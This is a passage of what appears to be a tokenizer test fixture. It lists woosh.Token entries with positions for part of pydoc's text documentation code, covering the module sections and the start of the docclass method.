woosh.Token(woosh.NAME, 'name', 1265, 52, 1265, 56),
woosh.Token(woosh.OP, ')', 1265, 56, 1265, 57),
woosh.Token(woosh.OP, ']', 1265, 57, 1265, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1265, 58, 1266, 0),
woosh.Token(woosh.NAME, 'for', 1266, 12, 1266, 15),
woosh.Token(woosh.NAME, 'key', 1266, 16, 1266, 19),
woosh.Token(woosh.OP, ',', 1266, 19, 1266, 20),
woosh.Token(woosh.NAME, 'value', 1266, 21, 1266, 26),
woosh.Token(woosh.NAME, 'in', 1266, 27, 1266, 29),
woosh.Token(woosh.NAME, 'classes', 1266, 30, 1266, 37),
woosh.Token(woosh.OP, ':', 1266, 37, 1266, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1266, 38, 1267, 0),
woosh.Token(woosh.INDENT, ' ', 1267, 0, 1267, 16),
woosh.Token(woosh.NAME, 'contents', 1267, 16, 1267, 24),
woosh.Token(woosh.OP, '.', 1267, 24, 1267, 25),
woosh.Token(woosh.NAME, 'append', 1267, 25, 1267, 31),
woosh.Token(woosh.OP, '(', 1267, 31, 1267, 32),
woosh.Token(woosh.NAME, 'self', 1267, 32, 1267, 36),
woosh.Token(woosh.OP, '.', 1267, 36, 1267, 37),
woosh.Token(woosh.NAME, 'document', 1267, 37, 1267, 45),
woosh.Token(woosh.OP, '(', 1267, 45, 1267, 46),
woosh.Token(woosh.NAME, 'value', 1267, 46, 1267, 51),
woosh.Token(woosh.OP, ',', 1267, 51, 1267, 52),
woosh.Token(woosh.NAME, 'key', 1267, 53, 1267, 56),
woosh.Token(woosh.OP, ',', 1267, 56, 1267, 57),
woosh.Token(woosh.NAME, 'name', 1267, 58, 1267, 62),
woosh.Token(woosh.OP, ')', 1267, 62, 1267, 63),
woosh.Token(woosh.OP, ')', 1267, 63, 1267, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1267, 64, 1268, 0),
woosh.Token(woosh.DEDENT, ' ', 1268, 0, 1268, 12),
woosh.Token(woosh.NAME, 'result', 1268, 12, 1268, 18),
woosh.Token(woosh.OP, '=', 1268, 19, 1268, 20),
woosh.Token(woosh.NAME, 'result', 1268, 21, 1268, 27),
woosh.Token(woosh.OP, '+', 1268, 28, 1268, 29),
woosh.Token(woosh.NAME, 'self', 1268, 30, 1268, 34),
woosh.Token(woosh.OP, '.', 1268, 34, 1268, 35),
woosh.Token(woosh.NAME, 'section', 1268, 35, 1268, 42),
woosh.Token(woosh.OP, '(', 1268, 42, 1268, 43),
woosh.Token(woosh.STRING, "'CLASSES'", 1268, 43, 1268, 52),
woosh.Token(woosh.OP, ',', 1268, 52, 1268, 53),
woosh.Token(woosh.STRING, "'\\n'", 1268, 54, 1268, 58),
woosh.Token(woosh.OP, '.', 1268, 58, 1268, 59),
woosh.Token(woosh.NAME, 'join', 1268, 59, 1268, 63),
woosh.Token(woosh.OP, '(', 1268, 63, 1268, 64),
woosh.Token(woosh.NAME, 'contents', 1268, 64, 1268, 72),
woosh.Token(woosh.OP, ')', 1268, 72, 1268, 73),
woosh.Token(woosh.OP, ')', 1268, 73, 1268, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1268, 74, 1269, 0),
woosh.Token(woosh.DEDENT, ' ', 1270, 0, 1270, 8),
woosh.Token(woosh.NAME, 'if', 1270, 8, 1270, 10),
woosh.Token(woosh.NAME, 'funcs', 1270, 11, 1270, 16),
woosh.Token(woosh.OP, ':', 1270, 16, 1270, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1270, 17, 1271, 0),
woosh.Token(woosh.INDENT, ' ', 1271, 0, 1271, 12),
woosh.Token(woosh.NAME, 'contents', 1271, 12, 1271, 20),
woosh.Token(woosh.OP, '=', 1271, 21, 1271, 22),
woosh.Token(woosh.OP, '[', 1271, 23, 1271, 24),
woosh.Token(woosh.OP, ']', 1271, 24, 1271, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1271, 25, 1272, 0),
woosh.Token(woosh.NAME, 'for', 1272, 12, 1272, 15),
woosh.Token(woosh.NAME, 'key', 1272, 16, 1272, 19),
woosh.Token(woosh.OP, ',', 1272, 19, 1272, 20),
woosh.Token(woosh.NAME, 'value', 1272, 21, 1272, 26),
woosh.Token(woosh.NAME, 'in', 1272, 27, 1272, 29),
woosh.Token(woosh.NAME, 'funcs', 1272, 30, 1272, 35),
woosh.Token(woosh.OP, ':', 1272, 35, 1272, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1272, 36, 1273, 0),
woosh.Token(woosh.INDENT, ' ', 1273, 0, 1273, 16),
woosh.Token(woosh.NAME, 'contents', 1273, 16, 1273, 24),
woosh.Token(woosh.OP, '.', 1273, 24, 1273, 25),
woosh.Token(woosh.NAME, 'append', 1273, 25, 1273, 31),
woosh.Token(woosh.OP, '(', 1273, 31, 1273, 32),
woosh.Token(woosh.NAME, 'self', 1273, 32, 1273, 36),
woosh.Token(woosh.OP, '.', 1273, 36, 1273, 37),
woosh.Token(woosh.NAME, 'document', 1273, 37, 1273, 45),
woosh.Token(woosh.OP, '(', 1273, 45, 1273, 46),
woosh.Token(woosh.NAME, 'value', 1273, 46, 1273, 51),
woosh.Token(woosh.OP, ',', 1273, 51, 1273, 52),
woosh.Token(woosh.NAME, 'key', 1273, 53, 1273, 56),
woosh.Token(woosh.OP, ',', 1273, 56, 1273, 57),
woosh.Token(woosh.NAME, 'name', 1273, 58, 1273, 62),
woosh.Token(woosh.OP, ')', 1273, 62, 1273, 63),
woosh.Token(woosh.OP, ')', 1273, 63, 1273, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1273, 64, 1274, 0),
woosh.Token(woosh.DEDENT, ' ', 1274, 0, 1274, 12),
woosh.Token(woosh.NAME, 'result', 1274, 12, 1274, 18),
woosh.Token(woosh.OP, '=', 1274, 19, 1274, 20),
woosh.Token(woosh.NAME, 'result', 1274, 21, 1274, 27),
woosh.Token(woosh.OP, '+', 1274, 28, 1274, 29),
woosh.Token(woosh.NAME, 'self', 1274, 30, 1274, 34),
woosh.Token(woosh.OP, '.', 1274, 34, 1274, 35),
woosh.Token(woosh.NAME, 'section', 1274, 35, 1274, 42),
woosh.Token(woosh.OP, '(', 1274, 42, 1274, 43),
woosh.Token(woosh.STRING, "'FUNCTIONS'", 1274, 43, 1274, 54),
woosh.Token(woosh.OP, ',', 1274, 54, 1274, 55),
woosh.Token(woosh.STRING, "'\\n'", 1274, 56, 1274, 60),
woosh.Token(woosh.OP, '.', 1274, 60, 1274, 61),
woosh.Token(woosh.NAME, 'join', 1274, 61, 1274, 65),
woosh.Token(woosh.OP, '(', 1274, 65, 1274, 66),
woosh.Token(woosh.NAME, 'contents', 1274, 66, 1274, 74),
woosh.Token(woosh.OP, ')', 1274, 74, 1274, 75),
woosh.Token(woosh.OP, ')', 1274, 75, 1274, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1274, 76, 1275, 0),
woosh.Token(woosh.DEDENT, ' ', 1276, 0, 1276, 8),
woosh.Token(woosh.NAME, 'if', 1276, 8, 1276, 10),
woosh.Token(woosh.NAME, 'data', 1276, 11, 1276, 15),
woosh.Token(woosh.OP, ':', 1276, 15, 1276, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1276, 16, 1277, 0),
woosh.Token(woosh.INDENT, ' ', 1277, 0, 1277, 12),
woosh.Token(woosh.NAME, 'contents', 1277, 12, 1277, 20),
woosh.Token(woosh.OP, '=', 1277, 21, 1277, 22),
woosh.Token(woosh.OP, '[', 1277, 23, 1277, 24),
woosh.Token(woosh.OP, ']', 1277, 24, 1277, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1277, 25, 1278, 0),
woosh.Token(woosh.NAME, 'for', 1278, 12, 1278, 15),
woosh.Token(woosh.NAME, 'key', 1278, 16, 1278, 19),
woosh.Token(woosh.OP, ',', 1278, 19, 1278, 20),
woosh.Token(woosh.NAME, 'value', 1278, 21, 1278, 26),
woosh.Token(woosh.NAME, 'in', 1278, 27, 1278, 29),
woosh.Token(woosh.NAME, 'data', 1278, 30, 1278, 34),
woosh.Token(woosh.OP, ':', 1278, 34, 1278, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 1278, 35, 1279, 0),
woosh.Token(woosh.INDENT, ' ', 1279, 0, 1279, 16),
woosh.Token(woosh.NAME, 'contents', 1279, 16, 1279, 24),
woosh.Token(woosh.OP, '.', 1279, 24, 1279, 25),
woosh.Token(woosh.NAME, 'append', 1279, 25, 1279, 31),
woosh.Token(woosh.OP, '(', 1279, 31, 1279, 32),
woosh.Token(woosh.NAME, 'self', 1279, 32, 1279, 36),
woosh.Token(woosh.OP, '.', 1279, 36, 1279, 37),
woosh.Token(woosh.NAME, 'docother', 1279, 37, 1279, 45),
woosh.Token(woosh.OP, '(', 1279, 45, 1279, 46),
woosh.Token(woosh.NAME, 'value', 1279, 46, 1279, 51),
woosh.Token(woosh.OP, ',', 1279, 51, 1279, 52),
woosh.Token(woosh.NAME, 'key', 1279, 53, 1279, 56),
woosh.Token(woosh.OP, ',', 1279, 56, 1279, 57),
woosh.Token(woosh.NAME, 'name', 1279, 58, 1279, 62),
woosh.Token(woosh.OP, ',', 1279, 62, 1279, 63),
woosh.Token(woosh.NAME, 'maxlen', 1279, 64, 1279, 70),
woosh.Token(woosh.OP, '=', 1279, 70, 1279, 71),
woosh.Token(woosh.NUMBER, '70', 1279, 71, 1279, 73),
woosh.Token(woosh.OP, ')', 1279, 73, 1279, 74),
woosh.Token(woosh.OP, ')', 1279, 74, 1279, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1279, 75, 1280, 0),
woosh.Token(woosh.DEDENT, ' ', 1280, 0, 1280, 12),
woosh.Token(woosh.NAME, 'result', 1280, 12, 1280, 18),
woosh.Token(woosh.OP, '=', 1280, 19, 1280, 20),
woosh.Token(woosh.NAME, 'result', 1280, 21, 1280, 27),
woosh.Token(woosh.OP, '+', 1280, 28, 1280, 29),
woosh.Token(woosh.NAME, 'self', 1280, 30, 1280, 34),
woosh.Token(woosh.OP, '.', 1280, 34, 1280, 35),
woosh.Token(woosh.NAME, 'section', 1280, 35, 1280, 42),
woosh.Token(woosh.OP, '(', 1280, 42, 1280, 43),
woosh.Token(woosh.STRING, "'DATA'", 1280, 43, 1280, 49),
woosh.Token(woosh.OP, ',', 1280, 49, 1280, 50),
woosh.Token(woosh.STRING, "'\\n'", 1280, 51, 1280, 55),
woosh.Token(woosh.OP, '.', 1280, 55, 1280, 56),
woosh.Token(woosh.NAME, 'join', 1280, 56, 1280, 60),
woosh.Token(woosh.OP, '(', 1280, 60, 1280, 61),
woosh.Token(woosh.NAME, 'contents', 1280, 61, 1280, 69),
woosh.Token(woosh.OP, ')', 1280, 69, 1280, 70),
woosh.Token(woosh.OP, ')', 1280, 70, 1280, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1280, 71, 1281, 0),
woosh.Token(woosh.DEDENT, ' ', 1282, 0, 1282, 8),
woosh.Token(woosh.NAME, 'if', 1282, 8, 1282, 10),
woosh.Token(woosh.NAME, 'hasattr', 1282, 11, 1282, 18),
woosh.Token(woosh.OP, '(', 1282, 18, 1282, 19),
woosh.Token(woosh.NAME, 'object', 1282, 19, 1282, 25),
woosh.Token(woosh.OP, ',', 1282, 25, 1282, 26),
woosh.Token(woosh.STRING, "'__version__'", 1282, 27, 1282, 40),
woosh.Token(woosh.OP, ')', 1282, 40, 1282, 41),
woosh.Token(woosh.OP, ':', 1282, 41, 1282, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1282, 42, 1283, 0),
woosh.Token(woosh.INDENT, ' ', 1283, 0, 1283, 12),
woosh.Token(woosh.NAME, 'version', 1283, 12, 1283, 19),
woosh.Token(woosh.OP, '=', 1283, 20, 1283, 21),
woosh.Token(woosh.NAME, 'str', 1283, 22, 1283, 25),
woosh.Token(woosh.OP, '(', 1283, 25, 1283, 26),
woosh.Token(woosh.NAME, 'object', 1283, 26, 1283, 32),
woosh.Token(woosh.OP, '.', 1283, 32, 1283, 33),
woosh.Token(woosh.NAME, '__version__', 1283, 33, 1283, 44),
woosh.Token(woosh.OP, ')', 1283, 44, 1283, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1283, 45, 1284, 0),
woosh.Token(woosh.NAME, 'if', 1284, 12, 1284, 14),
woosh.Token(woosh.NAME, 'version', 1284, 15, 1284, 22),
woosh.Token(woosh.OP, '[', 1284, 22, 1284, 23),
woosh.Token(woosh.OP, ':', 1284, 23, 1284, 24),
woosh.Token(woosh.NUMBER, '11', 1284, 24, 1284, 26),
woosh.Token(woosh.OP, ']', 1284, 26, 1284, 27),
woosh.Token(woosh.OP, '==', 1284, 28, 1284, 30),
woosh.Token(woosh.STRING, "'$'", 1284, 31, 1284, 34),
woosh.Token(woosh.OP, '+', 1284, 35, 1284, 36),
woosh.Token(woosh.STRING, "'Revision: '", 1284, 37, 1284, 49),
woosh.Token(woosh.NAME, 'and', 1284, 50, 1284, 53),
woosh.Token(woosh.NAME, 'version', 1284, 54, 1284, 61),
woosh.Token(woosh.OP, '[', 1284, 61, 1284, 62),
woosh.Token(woosh.OP, '-', 1284, 62, 1284, 63),
woosh.Token(woosh.NUMBER, '1', 1284, 63, 1284, 64),
woosh.Token(woosh.OP, ':', 1284, 64, 1284, 65),
woosh.Token(woosh.OP, ']', 1284, 65, 1284, 66),
woosh.Token(woosh.OP, '==', 1284, 67, 1284, 69),
woosh.Token(woosh.STRING, "'$'", 1284, 70, 1284, 73),
woosh.Token(woosh.OP, ':', 1284, 73, 1284, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1284, 74, 1285, 0),
woosh.Token(woosh.INDENT, ' ', 1285, 0, 1285, 16),
woosh.Token(woosh.NAME, 'version', 1285, 16, 1285, 23),
woosh.Token(woosh.OP, '=', 1285, 24, 1285, 25),
woosh.Token(woosh.NAME, 'version', 1285, 26, 1285, 33),
woosh.Token(woosh.OP, '[', 1285, 33, 1285, 34),
woosh.Token(woosh.NUMBER, '11', 1285, 34, 1285, 36),
woosh.Token(woosh.OP, ':', 1285, 36, 1285, 37),
woosh.Token(woosh.OP, '-', 1285, 37, 1285, 38),
woosh.Token(woosh.NUMBER, '1', 1285, 38, 1285, 39),
woosh.Token(woosh.OP, ']', 1285, 39, 1285, 40),
woosh.Token(woosh.OP, '.', 1285, 40, 1285, 41),
woosh.Token(woosh.NAME, 'strip', 1285, 41, 1285, 46),
woosh.Token(woosh.OP, '(', 1285, 46, 1285, 47),
woosh.Token(woosh.OP, ')', 1285, 47, 1285, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1285, 48, 1286, 0),
woosh.Token(woosh.DEDENT, ' ', 1286, 0, 1286, 12),
woosh.Token(woosh.NAME, 'result', 1286, 12, 1286, 18),
woosh.Token(woosh.OP, '=', 1286, 19, 1286, 20),
woosh.Token(woosh.NAME, 'result', 1286, 21, 1286, 27),
woosh.Token(woosh.OP, '+', 1286, 28, 1286, 29),
woosh.Token(woosh.NAME, 'self', 1286, 30, 1286, 34),
woosh.Token(woosh.OP, '.', 1286, 34, 1286, 35),
woosh.Token(woosh.NAME, 'section', 1286, 35, 1286, 42),
woosh.Token(woosh.OP, '(', 1286, 42, 1286, 43),
woosh.Token(woosh.STRING, "'VERSION'", 1286, 43, 1286, 52),
woosh.Token(woosh.OP, ',', 1286, 52, 1286, 53),
woosh.Token(woosh.NAME, 'version', 1286, 54, 1286, 61),
woosh.Token(woosh.OP, ')', 1286, 61, 1286, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1286, 62, 1287, 0),
woosh.Token(woosh.DEDENT, ' ', 1287, 0, 1287, 8),
woosh.Token(woosh.NAME, 'if', 1287, 8, 1287, 10),
woosh.Token(woosh.NAME, 'hasattr', 1287, 11, 1287, 18),
woosh.Token(woosh.OP, '(', 1287, 18, 1287, 19),
woosh.Token(woosh.NAME, 'object', 1287, 19, 1287, 25),
woosh.Token(woosh.OP, ',', 1287, 25, 1287, 26),
woosh.Token(woosh.STRING, "'__date__'", 1287, 27, 1287, 37),
woosh.Token(woosh.OP, ')', 1287, 37, 1287, 38),
woosh.Token(woosh.OP, ':', 1287, 38, 1287, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1287, 39, 1288, 0),
woosh.Token(woosh.INDENT, ' ', 1288, 0, 1288, 12),
woosh.Token(woosh.NAME, 'result', 1288, 12, 1288, 18),
woosh.Token(woosh.OP, '=', 1288, 19, 1288, 20),
woosh.Token(woosh.NAME, 'result', 1288, 21, 1288, 27),
woosh.Token(woosh.OP, '+', 1288, 28, 1288, 29),
woosh.Token(woosh.NAME, 'self', 1288, 30, 1288, 34),
woosh.Token(woosh.OP, '.', 1288, 34, 1288, 35),
woosh.Token(woosh.NAME, 'section', 1288, 35, 1288, 42),
woosh.Token(woosh.OP, '(', 1288, 42, 1288, 43),
woosh.Token(woosh.STRING, "'DATE'", 1288, 43, 1288, 49),
woosh.Token(woosh.OP, ',', 1288, 49, 1288, 50),
woosh.Token(woosh.NAME, 'str', 1288, 51, 1288, 54),
woosh.Token(woosh.OP, '(', 1288, 54, 1288, 55),
woosh.Token(woosh.NAME, 'object', 1288, 55, 1288, 61),
woosh.Token(woosh.OP, '.', 1288, 61, 1288, 62),
woosh.Token(woosh.NAME, '__date__', 1288, 62, 1288, 70),
woosh.Token(woosh.OP, ')', 1288, 70, 1288, 71),
woosh.Token(woosh.OP, ')', 1288, 71, 1288, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1288, 72, 1289, 0),
woosh.Token(woosh.DEDENT, ' ', 1289, 0, 1289, 8),
woosh.Token(woosh.NAME, 'if', 1289, 8, 1289, 10),
woosh.Token(woosh.NAME, 'hasattr', 1289, 11, 1289, 18),
woosh.Token(woosh.OP, '(', 1289, 18, 1289, 19),
woosh.Token(woosh.NAME, 'object', 1289, 19, 1289, 25),
woosh.Token(woosh.OP, ',', 1289, 25, 1289, 26),
woosh.Token(woosh.STRING, "'__author__'", 1289, 27, 1289, 39),
woosh.Token(woosh.OP, ')', 1289, 39, 1289, 40),
woosh.Token(woosh.OP, ':', 1289, 40, 1289, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1289, 41, 1290, 0),
woosh.Token(woosh.INDENT, ' ', 1290, 0, 1290, 12),
woosh.Token(woosh.NAME, 'result', 1290, 12, 1290, 18),
woosh.Token(woosh.OP, '=', 1290, 19, 1290, 20),
woosh.Token(woosh.NAME, 'result', 1290, 21, 1290, 27),
woosh.Token(woosh.OP, '+', 1290, 28, 1290, 29),
woosh.Token(woosh.NAME, 'self', 1290, 30, 1290, 34),
woosh.Token(woosh.OP, '.', 1290, 34, 1290, 35),
woosh.Token(woosh.NAME, 'section', 1290, 35, 1290, 42),
woosh.Token(woosh.OP, '(', 1290, 42, 1290, 43),
woosh.Token(woosh.STRING, "'AUTHOR'", 1290, 43, 1290, 51),
woosh.Token(woosh.OP, ',', 1290, 51, 1290, 52),
woosh.Token(woosh.NAME, 'str', 1290, 53, 1290, 56),
woosh.Token(woosh.OP, '(', 1290, 56, 1290, 57),
woosh.Token(woosh.NAME, 'object', 1290, 57, 1290, 63),
woosh.Token(woosh.OP, '.', 1290, 63, 1290, 64),
woosh.Token(woosh.NAME, '__author__', 1290, 64, 1290, 74),
woosh.Token(woosh.OP, ')', 1290, 74, 1290, 75),
woosh.Token(woosh.OP, ')', 1290, 75, 1290, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1290, 76, 1291, 0),
woosh.Token(woosh.DEDENT, ' ', 1291, 0, 1291, 8),
woosh.Token(woosh.NAME, 'if', 1291, 8, 1291, 10),
woosh.Token(woosh.NAME, 'hasattr', 1291, 11, 1291, 18),
woosh.Token(woosh.OP, '(', 1291, 18, 1291, 19),
woosh.Token(woosh.NAME, 'object', 1291, 19, 1291, 25),
woosh.Token(woosh.OP, ',', 1291, 25, 1291, 26),
woosh.Token(woosh.STRING, "'__credits__'", 1291, 27, 1291, 40),
woosh.Token(woosh.OP, ')', 1291, 40, 1291, 41),
woosh.Token(woosh.OP, ':', 1291, 41, 1291, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1291, 42, 1292, 0),
woosh.Token(woosh.INDENT, ' ', 1292, 0, 1292, 12),
woosh.Token(woosh.NAME, 'result', 1292, 12, 1292, 18),
woosh.Token(woosh.OP, '=', 1292, 19, 1292, 20),
woosh.Token(woosh.NAME, 'result', 1292, 21, 1292, 27),
woosh.Token(woosh.OP, '+', 1292, 28, 1292, 29),
woosh.Token(woosh.NAME, 'self', 1292, 30, 1292, 34),
woosh.Token(woosh.OP, '.', 1292, 34, 1292, 35),
woosh.Token(woosh.NAME, 'section', 1292, 35, 1292, 42),
woosh.Token(woosh.OP, '(', 1292, 42, 1292, 43),
woosh.Token(woosh.STRING, "'CREDITS'", 1292, 43, 1292, 52),
woosh.Token(woosh.OP, ',', 1292, 52, 1292, 53),
woosh.Token(woosh.NAME, 'str', 1292, 54, 1292, 57),
woosh.Token(woosh.OP, '(', 1292, 57, 1292, 58),
woosh.Token(woosh.NAME, 'object', 1292, 58, 1292, 64),
woosh.Token(woosh.OP, '.', 1292, 64, 1292, 65),
woosh.Token(woosh.NAME, '__credits__', 1292, 65, 1292, 76),
woosh.Token(woosh.OP, ')', 1292, 76, 1292, 77),
woosh.Token(woosh.OP, ')', 1292, 77, 1292, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 1292, 78, 1293, 0),
woosh.Token(woosh.DEDENT, ' ', 1293, 0, 1293, 8),
woosh.Token(woosh.NAME, 'try', 1293, 8, 1293, 11),
woosh.Token(woosh.OP, ':', 1293, 11, 1293, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1293, 12, 1294, 0),
woosh.Token(woosh.INDENT, ' ', 1294, 0, 1294, 12),
woosh.Token(woosh.NAME, 'file', 1294, 12, 1294, 16),
woosh.Token(woosh.OP, '=', 1294, 17, 1294, 18),
woosh.Token(woosh.NAME, 'inspect', 1294, 19, 1294, 26),
woosh.Token(woosh.OP, '.', 1294, 26, 1294, 27),
woosh.Token(woosh.NAME, 'getabsfile', 1294, 27, 1294, 37),
woosh.Token(woosh.OP, '(', 1294, 37, 1294, 38),
woosh.Token(woosh.NAME, 'object', 1294, 38, 1294, 44),
woosh.Token(woosh.OP, ')', 1294, 44, 1294, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1294, 45, 1295, 0),
woosh.Token(woosh.DEDENT, ' ', 1295, 0, 1295, 8),
woosh.Token(woosh.NAME, 'except', 1295, 8, 1295, 14),
woosh.Token(woosh.NAME, 'TypeError', 1295, 15, 1295, 24),
woosh.Token(woosh.OP, ':', 1295, 24, 1295, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1295, 25, 1296, 0),
woosh.Token(woosh.INDENT, ' ', 1296, 0, 1296, 12),
woosh.Token(woosh.NAME, 'file', 1296, 12, 1296, 16),
woosh.Token(woosh.OP, '=', 1296, 17, 1296, 18),
woosh.Token(woosh.STRING, "'(built-in)'", 1296, 19, 1296, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1296, 31, 1297, 0),
woosh.Token(woosh.DEDENT, ' ', 1297, 0, 1297, 8),
woosh.Token(woosh.NAME, 'result', 1297, 8, 1297, 14),
woosh.Token(woosh.OP, '=', 1297, 15, 1297, 16),
woosh.Token(woosh.NAME, 'result', 1297, 17, 1297, 23),
woosh.Token(woosh.OP, '+', 1297, 24, 1297, 25),
woosh.Token(woosh.NAME, 'self', 1297, 26, 1297, 30),
woosh.Token(woosh.OP, '.', 1297, 30, 1297, 31),
woosh.Token(woosh.NAME, 'section', 1297, 31, 1297, 38),
woosh.Token(woosh.OP, '(', 1297, 38, 1297, 39),
woosh.Token(woosh.STRING, "'FILE'", 1297, 39, 1297, 45),
woosh.Token(woosh.OP, ',', 1297, 45, 1297, 46),
woosh.Token(woosh.NAME, 'file', 1297, 47, 1297, 51),
woosh.Token(woosh.OP, ')', 1297, 51, 1297, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1297, 52, 1298, 0),
woosh.Token(woosh.NAME, 'return', 1298, 8, 1298, 14),
woosh.Token(woosh.NAME, 'result', 1298, 15, 1298, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1298, 21, 1299, 0),
woosh.Token(woosh.DEDENT, ' ', 1300, 0, 1300, 4),
woosh.Token(woosh.NAME, 'def', 1300, 4, 1300, 7),
woosh.Token(woosh.NAME, 'docclass', 1300, 8, 1300, 16),
woosh.Token(woosh.OP, '(', 1300, 16, 1300, 17),
woosh.Token(woosh.NAME, 'self', 1300, 17, 1300, 21),
woosh.Token(woosh.OP, ',', 1300, 21, 1300, 22),
woosh.Token(woosh.NAME, 'object', 1300, 23, 1300, 29),
woosh.Token(woosh.OP, ',', 1300, 29, 1300, 30),
woosh.Token(woosh.NAME, 'name', 1300, 31, 1300, 35),
woosh.Token(woosh.OP, '=', 1300, 35, 1300, 36),
woosh.Token(woosh.NAME, 'None', 1300, 36, 1300, 40),
woosh.Token(woosh.OP, ',', 1300, 40, 1300, 41),
woosh.Token(woosh.NAME, 'mod', 1300, 42, 1300, 45),
woosh.Token(woosh.OP, '=', 1300, 45, 1300, 46),
woosh.Token(woosh.NAME, 'None', 1300, 46, 1300, 50),
woosh.Token(woosh.OP, ',', 1300, 50, 1300, 51),
woosh.Token(woosh.OP, '*', 1300, 52, 1300, 53),
woosh.Token(woosh.NAME, 'ignored', 1300, 53, 1300, 60),
woosh.Token(woosh.OP, ')', 1300, 60, 1300, 61),
woosh.Token(woosh.OP, ':', 1300, 61, 1300, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1300, 62, 1301, 0),
woosh.Token(woosh.INDENT, ' ', 1301, 0, 1301, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a given class object."""', 1301, 8, 1301, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 1301, 66, 1302, 0),
woosh.Token(woosh.NAME, 'realname', 1302, 8, 1302, 16),
woosh.Token(woosh.OP, '=', 1302, 17, 1302, 18),
woosh.Token(woosh.NAME, 'object', 1302, 19, 1302, 25),
woosh.Token(woosh.OP, '.', 1302, 25, 1302, 26),
woosh.Token(woosh.NAME, '__name__', 1302, 26, 1302, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1302, 34, 1303, 0),
woosh.Token(woosh.NAME, 'name', 1303, 8, 1303, 12),
woosh.Token(woosh.OP, '=', 1303, 13, 1303, 14),
woosh.Token(woosh.NAME, 'name', 1303, 15, 1303, 19),
woosh.Token(woosh.NAME, 'or', 1303, 20, 1303, 22),
woosh.Token(woosh.NAME, 'realname', 1303, 23, 1303, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1303, 31, 1304, 0),
woosh.Token(woosh.NAME, 'bases', 1304, 8, 1304, 13),
woosh.Token(woosh.OP, '=', 1304, 14, 1304, 15),
woosh.Token(woosh.NAME, 'object', 1304, 16, 1304, 22),
woosh.Token(woosh.OP, '.', 1304, 22, 1304, 23),
woosh.Token(woosh.NAME, '__bases__', 1304, 23, 1304, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1304, 32, 1305, 0),
woosh.Token(woosh.NAME, 'def', 1306, 8, 1306, 11),
woosh.Token(woosh.NAME, 'makename', 1306, 12, 1306, 20),
woosh.Token(woosh.OP, '(', 1306, 20, 1306, 21),
woosh.Token(woosh.NAME, 'c', 1306, 21, 1306, 22),
woosh.Token(woosh.OP, ',', 1306, 22, 1306, 23),
woosh.Token(woosh.NAME, 'm', 1306, 24, 1306, 25),
woosh.Token(woosh.OP, '=', 1306, 25, 1306, 26),
woosh.Token(woosh.NAME, 'object', 1306, 26, 1306, 32),
woosh.Token(woosh.OP, '.', 1306, 32, 1306, 33),
woosh.Token(woosh.NAME, '__module__', 1306, 33, 1306, 43),
woosh.Token(woosh.OP, ')', 1306, 43, 1306, 44),
woosh.Token(woosh.OP, ':', 1306, 44, 1306, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1306, 45, 1307, 0),
woosh.Token(woosh.INDENT, ' ', 1307, 0, 1307, 12),
woosh.Token(woosh.NAME, 'return', 1307, 12, 1307, 18),
woosh.Token(woosh.NAME, 'classname', 1307, 19, 1307, 28),
woosh.Token(woosh.OP, '(', 1307, 28, 1307, 29),
woosh.Token(woosh.NAME, 'c', 1307, 29, 1307, 30),
woosh.Token(woosh.OP, ',', 1307, 30, 1307, 31),
woosh.Token(woosh.NAME, 'm', 1307, 32, 1307, 33),
woosh.Token(woosh.OP, ')', 1307, 33, 1307, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1307, 34, 1308, 0),
woosh.Token(woosh.DEDENT, ' ', 1309, 0, 1309, 8),
woosh.Token(woosh.NAME, 'if', 1309, 8, 1309, 10),
woosh.Token(woosh.NAME, 'name', 1309, 11, 1309, 15),
woosh.Token(woosh.OP, '==', 1309, 16, 1309, 18),
woosh.Token(woosh.NAME, 'realname', 1309, 19, 1309, 27),
woosh.Token(woosh.OP, ':', 1309, 27, 1309, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1309, 28, 1310, 0),
woosh.Token(woosh.INDENT, ' ', 1310, 0, 1310, 12),
woosh.Token(woosh.NAME, 'title', 1310, 12, 1310, 17),
woosh.Token(woosh.OP, '=', 1310, 18, 1310, 19),
woosh.Token(woosh.STRING, "'class '", 1310, 20, 1310, 28),
woosh.Token(woosh.OP, '+', 1310, 29, 1310, 30),
woosh.Token(woosh.NAME, 'self', 1310, 31, 1310, 35),
woosh.Token(woosh.OP, '.', 1310, 35, 1310, 36),
woosh.Token(woosh.NAME, 'bold', 1310, 36, 1310, 40),
woosh.Token(woosh.OP, '(', 1310, 40, 1310, 41),
